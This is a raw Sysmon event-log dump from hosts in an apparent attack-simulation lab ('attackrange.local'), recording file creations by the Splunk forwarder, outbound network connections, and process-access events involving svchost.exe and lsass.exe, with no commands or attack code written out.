AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58409-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151579Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:41.236{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14D1A01F33CEEAD551F9A357B98F95B3,SHA256=E5808BBCD8686FEF156AB8D7BA4AA49C9AADEF1FAD7C7B1783386322BE27F7F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104981Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:42.581{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00EB98CD6BC99325AC8CE7F62BCEA6C,SHA256=3108E400C4F2B7BC9F3B29504E4C458A0F6D6AB17422DF7AF3C0E5694FCB68F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151587Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:41.045{39BD8DE3-2672-60CA-E003-00000000D101}5836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58410-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000151586Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:42.620{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151585Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:42.620{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151584Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:42.620{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151583Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:42.388{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\formhistory.sqlite-journalMD5=40EE43D51934690A065B3064CDB76587,SHA256=5FC55A559AE03928C11679CE147603212AA551C1AA7A381C11C483B0982E202A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151582Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:42.251{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72111F4E320BA40C30D4778BB366DF9C,SHA256=30A75D5ADEED8AE5F85B47F19601F641CF9F1127163F9DC94334144B4A238ACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151581Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:42.235{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8CAE06F340ABCA9C4FB143EB2979FF0,SHA256=D6D528E1D362690D9EF16771AD5E97CFC7DE845CA7DF4645A994BFA8202C5D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104984Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:43.951{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F8DB343667449062C28E3EE9937F9F,SHA256=9C363E07B4D8173284F228DF333E31966301F4AE2FD13FA3022328C2798E351B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104983Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:41.781{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55425-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000104982Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:43.322{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-FD18-60C9-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151588Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:43.266{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9000F84E0166F30951F3351B6F63DD,SHA256=9C59DCEB060A3908DF10AFE9583767424F400862604A988705B5E5D649FC42EF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105013Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15C0-60CA-5008-00000000CF01}5216C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105012Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15C0-60CA-5008-00000000CF01}5216C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105011Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15C0-60CA-5008-00000000CF01}5216C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105010Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105009Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105008Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105007Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.234{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105006Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105005Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105004Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105003Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105002Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105001Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105000Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104999Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104998Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104997Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104996Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104995Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104994Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104993Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104992Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 